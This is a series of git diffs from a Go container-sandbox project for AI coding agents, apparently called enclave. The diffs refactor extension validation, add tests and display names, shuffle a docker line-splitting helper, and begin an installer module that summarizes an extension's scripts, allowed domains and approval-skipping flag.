--- a/internal/config/testdata/golden/tool-ext-codex.json
+++ b/internal/config/testdata/golden/tool-ext-codex.json
@@ -1,6 +1,7 @@
 {
   "type": "sandbox",
   "name": "codex",
+  "display_name": "OpenAI Codex CLI",
   "description": "OpenAI Codex CLI",
   "default_included": true,
   "priority": 100,

--- a/internal/config/testdata/golden/tool-ext-mistral-vibe.json
+++ b/internal/config/testdata/golden/tool-ext-mistral-vibe.json
@@ -1,6 +1,7 @@
 {
   "type": "sandbox",
   "name": "mistral-vibe",
+  "display_name": "Mistral Vibe",
   "description": "Mistral Vibe CLI coding assistant",
   "priority": 100
 }

--- a/internal/config/testdata/golden/tool-ext-opencode.json
+++ b/internal/config/testdata/golden/tool-ext-opencode.json
@@ -1,6 +1,7 @@
 {
   "type": "sandbox",
   "name": "opencode",
+  "display_name": "OpenCode",
   "description": "OpenCode terminal IDE",
   "default_included": true,
   "priority": 100,

--- a/internal/config/testdata/golden/tool-ext-pi.json
+++ b/internal/config/testdata/golden/tool-ext-pi.json
@@ -1,6 +1,7 @@
 {
   "type": "sandbox",
   "name": "pi",
+  "display_name": "Pi Coding Agent",
   "description": "A minimal terminal coding harness",
   "default_included": true,
   "priority": 100,

--- a/internal/config/testdata/golden/tool-ext-theia-next.json
+++ b/internal/config/testdata/golden/tool-ext-theia-next.json
@@ -1,6 +1,7 @@
 {
   "type": "sandbox",
   "name": "theia-next",
+  "display_name": "Theia IDE (Next)",
   "description": "Theia Next (preview) desktop IDE attached to an enclave container",
   "default_included": true,
   "priority": 100,

--- a/internal/config/testdata/golden/tool-ext-theia.json
+++ b/internal/config/testdata/golden/tool-ext-theia.json
@@ -1,6 +1,7 @@
 {
   "type": "sandbox",
   "name": "theia",
+  "display_name": "Theia IDE",
   "description": "Theia desktop IDE attached to an enclave container",
   "default_included": true,
   "priority": 100,

--- a/internal/config/validate_extensions.go
+++ b/internal/config/validate_extensions.go
@@ -40,20 +40,34 @@ func ValidateExtensions(paths model.Paths) (ExtensionValidation, error) {
 	if err := validateBuiltinFeatureExtensions(paths, &result); err != nil {
 		return result, err
 	}
-	if err := validateUserToolExtensions(paths, &result); err != nil {
+	if err := validateUserExtensions(paths, model.KindTool, &result); err != nil {
 		return result, err
 	}
-	if err := validateUserFeatureExtensions(paths, &result); err != nil {
+	if err := validateUserExtensions(paths, model.KindFeature, &result); err != nil {
 		return result, err
 	}
 
 	return result, nil
 }
 
+// ValidateExtensionDir validates the single user extension directory dir as an
+// extension of kind. dir's parent stands in for the kind's user extension root,
+// so built-ins still resolve from paths while nothing else is scanned: that is
+// what lets the extension installer check a staged copy, before the swap,
+// exactly as it would be checked once installed. No built-in pass runs beside
+// it, so spec content is validated even when dir shadows a built-in.
+func ValidateExtensionDir(dir string, kind model.ExtensionKind, paths model.Paths) ExtensionValidation {
+	result := ExtensionValidation{}
+	scoped := withUserExtensionRoot(paths, kind, filepath.Dir(dir))
+	validateUserExtension(scoped, kind, filepath.Base(dir), true, &result)
+	return result
+}
+
 // hasOwnSpecFile reports whether extDir itself (no user-override resolution)
 // contains a spec.yaml or spec.json.
 func hasOwnSpecFile(extDir string) bool {
-	return util.PathExists(filepath.Join(extDir, SpecFilename)) || util.PathExists(filepath.Join(extDir, SpecFilenameJSON))
+	_, ok := ownSpecFile(extDir)
+	return ok
 }
 
 func validateBuiltinToolExtensions(paths model.Paths, result *ExtensionValidation) error {
@@ -63,7 +77,7 @@ func validateBuiltinToolExtensions(paths model.Paths, result *ExtensionValidatio
 	}
 
 	for _, entry := range entries {
-		if !entry.IsDir() {
+		if !isExtensionDir(entry) {
 			continue
 		}
 		name := entry.Name()
@@ -89,11 +103,14 @@ func validateBuiltinToolExtensions(paths model.Paths, result *ExtensionValidatio
 	return nil
 }
 
-func validateUserToolExtensions(paths model.Paths, result *ExtensionValidation) error {
-	if strings.TrimSpace(paths.UserToolsDir) == "" {
+// validateUserExtensions validates every extension in the user extension root
+// of kind, one directory at a time.
+func validateUserExtensions(paths model.Paths, kind model.ExtensionKind, result *ExtensionValidation) error {
+	_, userRoot := ExtensionRoots(paths, kind)
+	if strings.TrimSpace(userRoot) == "" {
 		return nil
 	}
-	entries, err := os.ReadDir(paths.UserToolsDir)
+	entries, err := os.ReadDir(userRoot)
 	if err != nil {
 		if os.IsNotExist(err) {
 			return nil
@@ -102,48 +119,74 @@ func validateUserToolExtensions(paths model.Paths, result *ExtensionValidation) 
 	}
 
 	for _, entry := range entries {
-		if !entry.IsDir() {
+		if !isExtensionDir(entry) {
 			continue
 		}
-		name := entry.Name()
-		userDir := filepath.Join(paths.UserToolsDir, name)
-		builtinDir, _ := ResolveToolDirs(paths, name)
-		hasBuiltin := builtinDir != ""
+		validateUserExtension(paths, kind, entry.Name(), false, result)
+	}
 
-		if util.IsDir(filepath.Join(userDir, "go")) {
-			result.Warnings = append(result.Warnings, fmt.Sprintf("tool %q: user go/ handlers are ignored (requires recompilation)", name))
-		}
+	return nil
+}
 
-		hasUserSpec := hasOwnSpecFile(userDir)
-		if !hasBuiltin && !hasUserSpec {
-			result.Warnings = append(result.Warnings, fmt.Sprintf("tool %q: missing %s in user extension (skipping)", name, SpecFilename))
-			continue
-		}
+// validateUserExtension validates one user extension of kind. When a built-in
+// of the same name exists, its spec content is validated only if
+// validateOverrideContent is set: the full-tree pass leaves it off because its
+// built-in pass already checked the same merged spec.
+func validateUserExtension(paths model.Paths, kind model.ExtensionKind, name string, validateOverrideContent bool, result *ExtensionValidation) {
+	_, userRoot := ExtensionRoots(paths, kind)
+	userDir := filepath.Join(userRoot, name)
+	builtinDir, _ := ResolveExtensionDirs(paths, kind, name)
+	hasBuiltin := builtinDir != ""
 
-		if !hasBuiltin {
-			// User-only tool: its spec.yaml must be fully self-contained, so
-			// validate identity/profile/settings content directly here (the
-			// builtin pass below never sees this name).
-			validateToolSpecContent(paths, name, result)
-			if !util.PathExists(filepath.Join(userDir, model.InstallScriptFilename)) {
-				result.Warnings = append(result.Warnings, fmt.Sprintf("tool %q: missing %s in user extension", name, model.InstallScriptFilename))
-			}
-			if !util.PathExists(filepath.Join(userDir, model.AllowlistFilename)) {
-				result.Warnings = append(result.Warnings, fmt.Sprintf("tool %q: missing %s in user extension", name, model.AllowlistFilename))
-			}
-		}
-		// When hasBuiltin is true, the builtin pass already validated the
-		// effective (override-resolved) spec content for this name, so a
-		// user override's content is not re-validated here to avoid
-		// reporting the same problem twice.
+	if util.IsDir(filepath.Join(userDir, "go")) {
+		result.Warnings = append(result.Warnings, fmt.Sprintf("%s %q: user go/ handlers are ignored (requires recompilation)", kind.Label(), name))
+	}
 
+	if !hasBuiltin && !hasOwnSpecFile(userDir) {
+		result.Warnings = append(result.Warnings, fmt.Sprintf("%s %q: missing %s in user extension (skipping)", kind.Label(), name, SpecFilename))
+		return
+	}
+	switch {
+	case !hasBuiltin:
+		validateUserOnlyExtension(paths, kind, name, userDir, result)
+	case validateOverrideContent:
+		validateSpecContent(paths, kind, name, result)
+	}
+
+	if kind == model.KindTool {
 		userAllowlistPath := filepath.Join(userDir, model.AllowlistFilename)
 		if util.PathExists(userAllowlistPath) {
 			validateUserAllowlistIncludes(paths, name, userAllowlistPath, result)
 		}
 	}
+}
 
-	return nil
+// validateUserOnlyExtension validates a user extension that shadows no
+// built-in: nothing else ever looks at its spec document, and a tool
+// additionally has to carry the files the build expects to find beside it.
+func validateUserOnlyExtension(paths model.Paths, kind model.ExtensionKind, name string, userDir string, result *ExtensionValidation) {
+	validateSpecContent(paths, kind, name, result)
+	if kind != model.KindTool {
+		return
+	}
+	for _, required := range []string{model.InstallScriptFilename, model.AllowlistFilename} {
+		if !util.PathExists(filepath.Join(userDir, required)) {
+			result.Warnings = append(result.Warnings, fmt.Sprintf("tool %q: missing %s in user extension", name, required))
+		}
+	}
+}
+
+// validateSpecContent validates the effective (override-resolved) spec document
+// for name.
+func validateSpecContent(paths model.Paths, kind model.ExtensionKind, name string, result *ExtensionValidation) {
+	switch kind {
+	case model.KindTool:
+		validateToolSpecContent(paths, name, result)
+	default:
+		if _, err := LoadExtension(paths, kind, name); err != nil {
+			result.Errors = append(result.Errors, fmt.Sprintf("%s %q: invalid %s: %v", kind.Label(), name, SpecFilename, err))
+		}
+	}
 }
 
 // validateToolSpecContent loads the effective (override-resolved) spec.yaml
@@ -194,7 +237,7 @@ func validateBuiltinFeatureExtensions(paths model.Paths, result *ExtensionValida
 	}
 
 	for _, entry := range entries {
-		if !entry.IsDir() {
+		if !isExtensionDir(entry) {
 			continue
 		}
 		name := entry.Name()
@@ -217,51 +260,6 @@ func validateBuiltinFeatureExtensions(paths model.Paths, result *ExtensionValida
 				}
 			}
 		}
-	}
-
-	return nil
-}
-
-func validateUserFeatureExtensions(paths model.Paths, result *ExtensionValidation) error {
-	if strings.TrimSpace(paths.UserFeaturesDir) == "" {
-		return nil
-	}
-	entries, err := os.ReadDir(paths.UserFeaturesDir)
-	if err != nil {
-		if os.IsNotExist(err) {
-			return nil
-		}
-		return err
-	}
-
-	for _, entry := range entries {
-		if !entry.IsDir() {
-			continue
-		}
-		name := entry.Name()
-		userDir := filepath.Join(paths.UserFeaturesDir, name)
-		builtinDir, _ := ResolveFeatureDirs(paths, name)
-		hasBuiltin := builtinDir != ""
-
-		if util.IsDir(filepath.Join(userDir, "go")) {
-			result.Warnings = append(result.Warnings, fmt.Sprintf("feature %q: user go/ handlers are ignored (requires recompilation)", name))
-		}
-
-		hasUserSpec := hasOwnSpecFile(userDir)
-		if !hasBuiltin && !hasUserSpec {
-			result.Warnings = append(result.Warnings, fmt.Sprintf("feature %q: missing %s in user extension (skipping)", name, SpecFilename))
-			continue
-		}
-
-		if !hasBuiltin {
-			// User-only feature: validate its self-contained spec content
-			// (the builtin pass above never sees this name).
-			if _, err := LoadFeatureExtension(paths, name); err != nil {
-				result.Errors = append(result.Errors, fmt.Sprintf("feature %q: invalid %s: %v", name, SpecFilename, err))
-			}
-		}
-		// When hasBuiltin is true, the builtin pass already validated the
-		// effective (override-resolved) spec content for this name.
 	}
 
 	return nil

--- a/internal/config/validate_extensions.go
+++ b/internal/config/validate_extensions.go
@@ -138,7 +138,7 @@ func validateUserExtension(paths model.Paths, kind model.ExtensionKind, name str
 	builtinDir, _ := ResolveExtensionDirs(paths, kind, name)
 	hasBuiltin := builtinDir != ""
 
-	if util.IsDir(filepath.Join(userDir, "go")) {
+	if util.IsDir(filepath.Join(userDir, model.ExtensionGoDir)) {
 		result.Warnings = append(result.Warnings, fmt.Sprintf("%s %q: user go/ handlers are ignored (requires recompilation)", kind.Label(), name))
 	}
 

--- a/internal/config/validate_extensions_test.go
+++ b/internal/config/validate_extensions_test.go
@@ -17,9 +17,7 @@ import (
 )
 
 func TestValidateExtensionsUserAllowlistInvalidIncludeErrors(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	createValidToolExtension(t, paths.ToolsDir, "claude")
 	writeValidationFile(t, filepath.Join(paths.UserToolsDir, "claude", model.AllowlistFilename), "conf-file=/tmp/not-allowed.conf\n")
 
@@ -33,9 +31,7 @@ func TestValidateExtensionsUserAllowlistInvalidIncludeErrors(t *testing.T) {
 }
 
 func TestValidateExtensionsUserAllowlistBuiltInIncludeAccepted(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	createValidToolExtension(t, paths.ToolsDir, "claude")
 	writeValidationFile(t, filepath.Join(paths.AllowlistsDir, "fragments", "base.conf"), "server=/example.com/8.8.8.8\n")
 	writeValidationFile(t, filepath.Join(paths.UserToolsDir, "claude", model.AllowlistFilename), "conf-file=/etc/dnsmasq.allowlists/fragments/base.conf\n")
@@ -50,9 +46,7 @@ func TestValidateExtensionsUserAllowlistBuiltInIncludeAccepted(t *testing.T) {
 }
 
 func TestValidateExtensionsUserGoDirWarnsAndPartialOverrideNeedsNoManifest(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	createValidToolExtension(t, paths.ToolsDir, "claude")
 	writeValidationFile(t, filepath.Join(paths.UserToolsDir, "claude", "go", "README.md"), "ignored\n")
 	writeValidationFile(t, filepath.Join(paths.UserToolsDir, "claude", "templates", "custom.json"), "{}\n")
@@ -73,9 +67,7 @@ func TestValidateExtensionsUserGoDirWarnsAndPartialOverrideNeedsNoManifest(t *te
 }
 
 func TestValidateExtensionsUserOnlyToolMissingSpecWarnsAndSkips(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	// A user-only tool directory that exists but never got a spec.yaml (for
 	// example, a leftover README from a partial/abandoned override) should be
 	// skipped with a warning rather than validated.
@@ -94,9 +86,7 @@ func TestValidateExtensionsUserOnlyToolMissingSpecWarnsAndSkips(t *testing.T) {
 }
 
 func TestValidateExtensionsBuiltinToolMissingSpecErrors(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	// A builtin tool directory with supporting files but no spec.yaml at all.
 	writeValidationFile(t, filepath.Join(paths.ToolsDir, "broken", model.InstallScriptFilename), "#!/usr/bin/env bash\n")
 	writeValidationFile(t, filepath.Join(paths.ToolsDir, "broken", model.AllowlistFilename), "server=/example.com/8.8.8.8\n")
@@ -111,9 +101,7 @@ func TestValidateExtensionsBuiltinToolMissingSpecErrors(t *testing.T) {
 }
 
 func TestValidateExtensionsBuiltinToolBadIdentityErrors(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	// spec.yaml's name field does not match its directory name.
 	writeValidationFile(t, filepath.Join(paths.ToolsDir, "claude", SpecFilename), toolSpecYAML("wrong-name"))
 	writeValidationFile(t, filepath.Join(paths.ToolsDir, "claude", model.InstallScriptFilename), "#!/usr/bin/env bash\n")
@@ -129,9 +117,7 @@ func TestValidateExtensionsBuiltinToolBadIdentityErrors(t *testing.T) {
 }
 
 func TestValidateExtensionsBuiltinToolBadIdentityReportedOnce(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	// A tool whose spec.yaml name mismatches its directory fails to load as both
 	// a model.Extension and a model.Profile — both call LoadSpec, which surfaces
 	// the same identity error. It must be reported exactly once, not per load.
@@ -155,9 +141,7 @@ func TestValidateExtensionsBuiltinToolBadIdentityReportedOnce(t *testing.T) {
 }
 
 func TestValidateExtensionsBuiltinToolBadSettingsErrors(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	writeValidationFile(t, filepath.Join(paths.ToolsDir, "claude", SpecFilename), `
 schemaVersion: "1"
 kind: sandbox
@@ -180,9 +164,7 @@ sandbox:
 }
 
 func TestValidateExtensionsBuiltinToolMissingSettingsTemplateErrors(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	writeValidationFile(t, filepath.Join(paths.ToolsDir, "claude", SpecFilename), `
 schemaVersion: "1"
 kind: sandbox
@@ -205,9 +187,7 @@ sandbox:
 }
 
 func TestValidateExtensionsBuiltinFeatureMissingSpecErrors(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	writeValidationFile(t, filepath.Join(paths.FeaturesDir, "broken-feature", model.InstallScriptFilename), "#!/usr/bin/env bash\n")
 
 	validation, err := ValidateExtensions(paths)
@@ -220,9 +200,7 @@ func TestValidateExtensionsBuiltinFeatureMissingSpecErrors(t *testing.T) {
 }
 
 func TestValidateExtensionsBuiltinFeatureBadIdentityErrors(t *testing.T) {
-	tmp := t.TempDir()
-	paths := testValidationPaths(tmp)
-	ensureValidationDirs(t, paths)
+	paths := newValidationPaths(t)
 	writeValidationFile(t, filepath.Join(paths.FeaturesDir, "devtools", SpecFilename), `
 schemaVersion: "1"
 kind: mixin
@@ -238,6 +216,52 @@ name: wrong-name
 	}
 }
 
+func TestValidateExtensionsSkipsDotDirectories(t *testing.T) {
+	paths := newValidationPaths(t)
+	writeValidationFile(t, filepath.Join(paths.UserFeaturesDir, ".incoming-99", "foo", SpecFilename), `{"schemaVersion":"1","kind":"mixin","name":"foo"}`)
+
+	result, err := ValidateExtensions(paths)
+	if err != nil {
+		t.Fatalf("ValidateExtensions: %v", err)
+	}
+	if len(result.Errors) != 0 || len(result.Warnings) != 0 {
+		t.Fatalf("expected no findings for a dot directory, got %+v", result)
+	}
+}
+
+// TestValidateExtensionDirReportsOnlyThatDirectory covers what the extension
+// installer needs: the staged copy it just wrote is validated, and nothing
+// beside it is — not a built-in, and not another directory in the same root.
+func TestValidateExtensionDirReportsOnlyThatDirectory(t *testing.T) {
+	paths := newValidationPaths(t)
+	writeValidationFile(t, filepath.Join(paths.UserFeaturesDir, "broken", SpecFilename), "schemaVersion: \"1\"\nkind: mixin\nname: mismatched\n")
+	writeValidationFile(t, filepath.Join(paths.UserFeaturesDir, "sound", SpecFilename), "schemaVersion: \"1\"\nkind: mixin\nname: sound\n")
+
+	result := ValidateExtensionDir(filepath.Join(paths.UserFeaturesDir, "broken"), model.KindFeature, paths)
+	if len(result.Errors) != 1 || !containsText(result.Errors, "feature \"broken\"") {
+		t.Fatalf("expected exactly one error for the named directory, got %+v", result)
+	}
+
+	result = ValidateExtensionDir(filepath.Join(paths.UserFeaturesDir, "sound"), model.KindFeature, paths)
+	if len(result.Errors) != 0 || len(result.Warnings) != 0 {
+		t.Fatalf("expected no findings for a valid directory, got %+v", result)
+	}
+}
+
+// TestValidateExtensionDirValidatesShadowingOverride covers a staged install
+// that shadows a built-in: no built-in pass runs beside it, so an invalid spec
+// has to be caught here.
+func TestValidateExtensionDirValidatesShadowingOverride(t *testing.T) {
+	paths := newValidationPaths(t)
+	createValidToolExtension(t, paths.ToolsDir, "claude")
+	writeValidationFile(t, filepath.Join(paths.UserToolsDir, "claude", SpecFilename), toolSpecYAML("wrong-name"))
+
+	result := ValidateExtensionDir(filepath.Join(paths.UserToolsDir, "claude"), model.KindTool, paths)
+	if !containsText(result.Errors, "tool \"claude\": invalid spec.yaml") {
+		t.Fatalf("expected the shadowing override's spec to be validated, got %+v", result)
+	}
+}
+
 // TestValidateExtensionsRealTreeHasZeroErrors ensures every built-in tool and
 // feature manifest validates cleanly.
 func TestValidateExtensionsRealTreeHasZeroErrors(t *testing.T) {
@@ -250,6 +274,14 @@ func TestValidateExtensionsRealTreeHasZeroErrors(t *testing.T) {
 	if len(validation.Errors) != 0 {
 		t.Fatalf("expected zero errors validating the real extensions/ tree, got: %v", validation.Errors)
 	}
+}
+
+func newValidationPaths(t *testing.T) model.Paths {
+	t.Helper()
+	tmp := t.TempDir()
+	paths := testValidationPaths(tmp)
+	ensureValidationDirs(t, paths)
+	return paths
 }
 
 func testValidationPaths(root string) model.Paths {

--- a/internal/docker/buildcache.go
+++ b/internal/docker/buildcache.go
@@ -10,6 +10,8 @@ package docker
 import (
 	"context"
 	"encoding/json"
+
+	"enclave/internal/util"
 )
 
 // BuildCachePrune removes build cache entries. When all is true, both
@@ -33,7 +35,7 @@ func BuildCacheUsage(ctx context.Context) (totalBytes uint64, reclaimableBytes u
 	if err != nil {
 		return 0, 0, err
 	}
-	for _, line := range splitLines(out) {
+	for _, line := range util.NonEmptyLines(out) {
 		var row struct {
 			Type        string `json:"Type"`
 			Size        string `json:"Size"`

--- a/internal/docker/buildcache.go
+++ b/internal/docker/buildcache.go
@@ -10,8 +10,6 @@ package docker
 import (
 	"context"
 	"encoding/json"
-
-	"enclave/internal/util"
 )
 
 // BuildCachePrune removes build cache entries. When all is true, both
@@ -35,7 +33,7 @@ func BuildCacheUsage(ctx context.Context) (totalBytes uint64, reclaimableBytes u
 	if err != nil {
 		return 0, 0, err
 	}
-	for _, line := range util.NonEmptyLines(out) {
+	for _, line := range splitLines(out) {
 		var row struct {
 			Type        string `json:"Type"`
 			Size        string `json:"Size"`

--- a/internal/docker/container.go
+++ b/internal/docker/container.go
@@ -16,8 +16,6 @@ import (
 	"strconv"
 	"strings"
 	"time"
-
-	"enclave/internal/util"
 )
 
 // ContainerList returns container summaries matching opts. It lists IDs with
@@ -34,7 +32,7 @@ func ContainerList(ctx context.Context, opts ListOptions) ([]Summary, error) {
 	if err != nil {
 		return nil, err
 	}
-	ids := util.NonEmptyLines(out)
+	ids := splitLines(out)
 	if len(ids) == 0 {
 		return nil, nil
 	}
@@ -88,7 +86,7 @@ func inspectContainers(ctx context.Context, ids []string) ([]InspectResponse, er
 }
 
 func decodeInspectResponses(out string) []InspectResponse {
-	lines := util.NonEmptyLines(out)
+	lines := splitLines(out)
 	results := make([]InspectResponse, 0, len(lines))
 	for _, line := range lines {
 		var info InspectResponse
@@ -182,4 +180,14 @@ func containerLogs(ctx context.Context, containerID string, extra ...string) (st
 		return buf.String(), &cliError{args: args, code: code, stderr: strings.TrimSpace(buf.String()), err: err}
 	}
 	return buf.String(), nil
+}
+
+func splitLines(out string) []string {
+	var lines []string
+	for _, line := range strings.Split(out, "\n") {
+		if trimmed := strings.TrimSpace(line); trimmed != "" {
+			lines = append(lines, trimmed)
+		}
+	}
+	return lines
 }

--- a/internal/docker/container.go
+++ b/internal/docker/container.go
@@ -16,6 +16,8 @@ import (
 	"strconv"
 	"strings"
 	"time"
+
+	"enclave/internal/util"
 )
 
 // ContainerList returns container summaries matching opts. It lists IDs with
@@ -32,7 +34,7 @@ func ContainerList(ctx context.Context, opts ListOptions) ([]Summary, error) {
 	if err != nil {
 		return nil, err
 	}
-	ids := splitLines(out)
+	ids := util.NonEmptyLines(out)
 	if len(ids) == 0 {
 		return nil, nil
 	}
@@ -86,7 +88,7 @@ func inspectContainers(ctx context.Context, ids []string) ([]InspectResponse, er
 }
 
 func decodeInspectResponses(out string) []InspectResponse {
-	lines := splitLines(out)
+	lines := util.NonEmptyLines(out)
 	results := make([]InspectResponse, 0, len(lines))
 	for _, line := range lines {
 		var info InspectResponse
@@ -180,14 +182,4 @@ func containerLogs(ctx context.Context, containerID string, extra ...string) (st
 		return buf.String(), &cliError{args: args, code: code, stderr: strings.TrimSpace(buf.String()), err: err}
 	}
 	return buf.String(), nil
-}
-
-func splitLines(out string) []string {
-	var lines []string
-	for _, line := range strings.Split(out, "\n") {
-		if trimmed := strings.TrimSpace(line); trimmed != "" {
-			lines = append(lines, trimmed)
-		}
-	}
-	return lines
 }

--- a/internal/docker/image.go
+++ b/internal/docker/image.go
@@ -132,7 +132,7 @@ func FindImageByLabel(ctx context.Context, label string, value string) (string, 
 	if err != nil {
 		return "", false, err
 	}
-	for _, tag := range util.NonEmptyLines(out) {
+	for _, tag := range splitLines(out) {
 		if tag == "" || tag == "<none>:<none>" || strings.HasPrefix(tag, "<none>:") {
 			continue
 		}

--- a/internal/docker/image.go
+++ b/internal/docker/image.go
@@ -132,7 +132,7 @@ func FindImageByLabel(ctx context.Context, label string, value string) (string, 
 	if err != nil {
 		return "", false, err
 	}
-	for _, tag := range splitLines(out) {
+	for _, tag := range util.NonEmptyLines(out) {
 		if tag == "" || tag == "<none>:<none>" || strings.HasPrefix(tag, "<none>:") {
 			continue
 		}

--- a/internal/extinstall/capabilities.go
+++ b/internal/extinstall/capabilities.go
@@ -1,0 +1,376 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"bufio"
+	"io/fs"
+	"os"
+	"path/filepath"
+	"sort"
+	"strings"
+
+	"enclave/internal/config"
+	"enclave/internal/model"
+	"enclave/internal/util"
+)
+
+// capabilities is what an extension will be able to do once installed.
+type capabilities struct {
+	// Spec is config's projection of the staged spec document, carried whole so
+	// a capability the schema gains reaches this summary without a second copy
+	// here. The fields below are the ones only the staged tree can answer.
+	Spec config.SpecSummary
+
+	InstallScript  bool
+	UpdateProbe    bool
+	StartupScripts []string
+	// AllowDomains folds the spec's allowedDomains together with the domains a
+	// staged gateway-allowlist.conf widens reachability to; that file's other
+	// directives are reported verbatim in AllowlistDirectives.
+	AllowDomains        []string
+	AllowlistDirectives []string
+	Skills              []string
+	WorkspaceFiles      []string
+	HomeFiles           []string
+	ShadowsBuiltin      bool
+	IgnoredGoDir        bool
+	Files               int
+	Bytes               int64
+}
+
+// yoloActive reports whether the extension arranges for the agent's launch
+// command to skip per-action approval: a yolo flag is declared and it is not
+// explicitly disabled (sandbox.yoloEnabled defaults to true when unset).
+func (c capabilities) yoloActive() bool {
+	return c.Spec.YoloFlag != "" && c.Spec.YoloEnabled
+}
+
+// entrypointDirs are the startup-script directories, by kind, in the order the
+// container runs them. The rule is entrypoint.sh's, not config's: it sources
+// entrypoint.d from the selected tool's directory alone, and
+// feature-entrypoint.d from each enabled feature's, so neither kind runs the
+// other's directory.
+func entrypointDirs(kind model.ExtensionKind) []string {
+	if kind == model.KindTool {
+		return []string{model.ToolEntrypointDir}
+	}
+	return []string{model.FeatureEntrypointDir}
+}
+
+// inspect summarizes a staged extension directory.
+func inspect(dir string, kind model.ExtensionKind) (capabilities, error) {
+	summary, err := config.SummarizeSpecDir(dir)
+	if err != nil {
+		return capabilities{}, err
+	}
+
+	tree, err := scanExtensionTree(dir, kind)
+	if err != nil {
+		return capabilities{}, err
+	}
+	domains := append([]string{}, summary.AllowedDomains...)
+	allowlistDomains, allowlistDirectives, err := parseAllowlistFile(filepath.Join(dir, model.AllowlistFilename))
+	if err != nil {
+		return capabilities{}, err
+	}
+
+	return capabilities{
+		Spec:                summary,
+		InstallScript:       tree.InstallScript,
+		UpdateProbe:         tree.UpdateProbe && config.UpdateProbeApplies(kind.SpecKind()),
+		StartupScripts:      tree.StartupScripts,
+		AllowDomains:        dedupeSorted(append(domains, allowlistDomains...)),
+		AllowlistDirectives: dedupeSorted(allowlistDirectives),
+		Skills:              tree.Skills,
+		WorkspaceFiles:      tree.WorkspaceFiles,
+		HomeFiles:           tree.HomeFiles,
+		IgnoredGoDir:        tree.GoDir,
+		Files:               tree.Files,
+		Bytes:               tree.Bytes,
+	}, nil
+}
+
+// extensionTree is what one walk of a staged or installed extension directory
+// answers about it.
+type extensionTree struct {
+	Files          int
+	Bytes          int64
+	InstallScript  bool
+	UpdateProbe    bool
+	GoDir          bool
+	StartupScripts []string
+	Skills         []string
+	WorkspaceFiles []string
+	HomeFiles      []string
+}
+
+// scanExtensionTree answers every filesystem-derived capability in one walk of
+// dir. The provenance sidecar counts towards nothing.
+func scanExtensionTree(dir string, kind model.ExtensionKind) (extensionTree, error) {
+	var (
+		skillsPrefix    = model.SkillsDirName + "/"
+		workspacePrefix = model.ExtensionFilesDir + "/" + model.ExtensionFilesWorkspaceDir + "/"
+		homePrefix      = model.ExtensionFilesDir + "/" + model.ExtensionFilesHomeDir + "/"
+	)
+	tree := extensionTree{}
+	entrypoints := entrypointDirs(kind)
+	scripts := map[string][]string{}
+
+	err := walkExtensionEntries(dir, func(rel string, _ string, entry fs.DirEntry) error {
+		if entry.IsDir() {
+			if rel == model.ExtensionGoDir {
+				tree.GoDir = true
+			}
+			if name, ok := immediateChild(rel, skillsPrefix); ok {
+				tree.Skills = append(tree.Skills, name)
+			}
+			return nil
+		}
+		if rel == model.ExtensionSourceFilename {
+			return nil
+		}
+		info, infoErr := entry.Info()
+		if infoErr != nil {
+			return infoErr
+		}
+		tree.Files++
+		tree.Bytes += info.Size()
+
+		switch rel {
+		case model.InstallScriptFilename:
+			tree.InstallScript = true
+		case model.CheckUpdateScriptFilename:
+			tree.UpdateProbe = true
+		}
+		if name, ok := immediateChild(rel, skillsPrefix); ok {
+			tree.Skills = append(tree.Skills, name)
+		}
+		for _, sub := range entrypoints {
+			// entrypoint.sh globs "*.sh", so anything else in the directory —
+			// a README, a helper data file — is never sourced.
+			if name, ok := immediateChild(rel, sub+"/"); ok && strings.HasSuffix(name, ".sh") {
+				scripts[sub] = append(scripts[sub], sub+"/"+name)
+			}
+		}
+		if name, ok := strings.CutPrefix(rel, workspacePrefix); ok {
+			tree.WorkspaceFiles = append(tree.WorkspaceFiles, name)
+		}
+		if name, ok := strings.CutPrefix(rel, homePrefix); ok {
+			tree.HomeFiles = append(tree.HomeFiles, name)
+		}
+		return nil
+	})
+	if err != nil {
+		return extensionTree{}, err
+	}
+
+	// Startup scripts stay grouped by entrypoint directory, in the order the
+	// kind runs them; everything else is a plain sorted listing.
+	for _, sub := range entrypoints {
+		group := scripts[sub]
+		sort.Strings(group)
+		tree.StartupScripts = append(tree.StartupScripts, group...)
+	}
+	sort.Strings(tree.Skills)
+	sort.Strings(tree.WorkspaceFiles)
+	sort.Strings(tree.HomeFiles)
+	return tree, nil
+}
+
+// immediateChild reports rel's name when rel is a direct child of prefix (which
+// ends in a slash), and false for anything nested deeper.
+func immediateChild(rel string, prefix string) (string, bool) {
+	name, ok := strings.CutPrefix(rel, prefix)
+	if !ok || name == "" || strings.Contains(name, "/") {
+		return "", false
+	}
+	return name, true
+}
+
+// leadingVar returns the substituted variable an initFiles path starts with,
+// accepting both $VAR and ${VAR}. Only the variables kit-init.sh hands to
+// envsubst count; any other name is left literal in the resolved path and so
+// behaves like an ordinary path segment.
+func leadingVar(path string) string {
